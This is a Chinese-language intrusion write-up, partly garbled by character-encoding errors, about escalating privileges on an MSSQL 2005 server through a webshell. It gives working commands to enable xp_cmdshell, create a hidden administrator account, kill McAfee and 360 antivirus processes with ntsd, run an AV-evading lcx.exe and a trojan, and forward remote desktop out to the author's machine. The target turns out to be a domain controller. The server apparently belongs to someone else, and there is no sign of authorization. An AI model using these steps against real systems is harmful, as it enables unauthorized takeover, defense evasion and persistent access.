文章作者:udb311

前言：本文主要以SQL 2005提權(quán)為主，講述過(guò)程種發(fā)現(xiàn)的一些問(wèn)題和成功經(jīng)驗(yàn)。至少拿到shell的過(guò)程不在細(xì)說(shuō)。

前期

在拿到一個(gè)webshell 后對(duì)提權(quán)進(jìn)行分析如下。

1、serv-u 6.4.0.
2、mssql sa密碼權(quán)限
3、sogou拼音輸入

觀(guān)察完畢后發(fā)現(xiàn)這個(gè)服務(wù)器的安全性還真不是一般的差，serv-u 目錄可寫(xiě)。sogu目錄可寫(xiě)。MSSQL sa 權(quán)限無(wú)降權(quán)。

第一，先用馬把sogou 目錄下的pingup.exe替換了。準(zhǔn)備等些時(shí)間再來(lái)上線(xiàn)呢，可是服務(wù)器安裝了mcafee。過(guò)不了它。

第二，再探serv-u,使用大馬自帶的serv-u 提權(quán)程序先執(zhí)行下。發(fā)現(xiàn)添加用戶(hù)。。原因不明，可能是因?yàn)榻禉?quán)。。。

第三、開(kāi)始入手MSSQL，sa權(quán)限很好辦。先來(lái)開(kāi)啟xp_cmdshell，SQL2005默認(rèn)禁用了xp_cmdshell。

1、使用shell下的SQL提權(quán)檢測(cè)sql組件存在。如圖

2、先使用xp_cmdshell，net user檢測(cè)下可用否？執(zhí)行net user，無(wú)果。

3、開(kāi)啟xp_cmdshell之前要先打開(kāi)高級(jí)配置 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;出現(xiàn)對(duì)象關(guān)閉時(shí)，不允許操作"。

4、開(kāi)啟xp_cmdshell 

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 出現(xiàn)對(duì)象關(guān)閉時(shí)，不允許操作"。

t00ls大牛們說(shuō)，是不是被降權(quán)了?

5、因?yàn)镾QL不允許，接下來(lái)?yè)Qaspxspy連接數(shù)據(jù)庫(kù)。

再次執(zhí)行 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--     6、查看權(quán)限，成功返回system。如圖

這才明白原來(lái)是aspspy功能方面的問(wèn)題。細(xì)節(jié)絕對(duì)成?。?/p>

中期

7、添加用戶(hù)
Exec master.dbo.xp_cmdshell 'net user admins udb311 /add'
如圖

密碼不滿(mǎn)足策略要求，要復(fù)雜些的。
再來(lái)Exec master.dbo.xp_cmdshell 'net user admins udb311!@# /add'

7、添加到administratos組
Exec master.dbo.xp_cmdshell 'net localgroup administrators admins /add'

8、遠(yuǎn)程桌面服務(wù)打開(kāi)著，ipconfig /all發(fā)現(xiàn)是內(nèi)網(wǎng)，沒(méi)有映射3389。

9、上傳lcx.exe 轉(zhuǎn)發(fā)之。發(fā)現(xiàn)執(zhí)行后無(wú)反應(yīng)。

10、換個(gè)遠(yuǎn)控木馬執(zhí)行。發(fā)現(xiàn)執(zhí)行后也無(wú)反應(yīng)。

11、tasklist /svc 查看服務(wù)。mcafee的進(jìn)程ID分別是1760 1804 1876 3844 4824。

12、ntsd -c q -p 1760 先干掉一個(gè)，然后一個(gè)個(gè)全干了。

13、重新執(zhí)行木馬和lcx.exe 仍然無(wú)反應(yīng)。

14、無(wú)耐之下，再看下進(jìn)程tasklist /svc
ntsd -c q -p 920
ntsd -c q -p 7192

干掉360

再觀(guān)察下執(zhí)行木馬發(fā)現(xiàn)文件大小為0了，肯定還是被殺。原來(lái)mcafee殺木馬不是把它給請(qǐng)出去，而是隔離。唉！

沒(méi)有突破mcafee的防線(xiàn)。。。

進(jìn)階

16、過(guò)了一會(huì)后，換一個(gè)號(hào)稱(chēng)最新的免殺lcx.exe 上傳后，開(kāi)始再次執(zhí)行轉(zhuǎn)發(fā)。

結(jié)果如下。

慢慢的有進(jìn)度了，很緩慢。

17、查看下端口連接，是否有l(wèi)cx轉(zhuǎn)發(fā)出來(lái)的。netstat -ano

如圖

有一條51到我的IP了。。。成功了

18、接下來(lái)在路由器做好本機(jī)的51端口映射，本機(jī)運(yùn)行l(wèi)cx.exe -listen 51 3389 監(jiān)聽(tīng)有數(shù)據(jù)返回，拿另外一臺(tái)虛擬機(jī)來(lái)連接。如圖

19、杯具啊，原來(lái)還是個(gè)DC。

總結(jié)：針對(duì)SQL 2005提權(quán)難度就沒(méi)有增加，而以往的SQL2000主要是在恢復(fù)xp_cmdshell上。MSSQL 2005反而更加簡(jiǎn)單些。最后提醒廣大的管理員朋友，請(qǐng)重視您的sa權(quán)限與密碼。對(duì)于本文有任何疑點(diǎn)歡迎前來(lái)討論。內(nèi)網(wǎng)滲透遇到的問(wèn)題與難點(diǎn)就是端口轉(zhuǎn)發(fā)和映射。另外還要考慮的是服務(wù)器上的殺毒軟件。

最新評(píng)論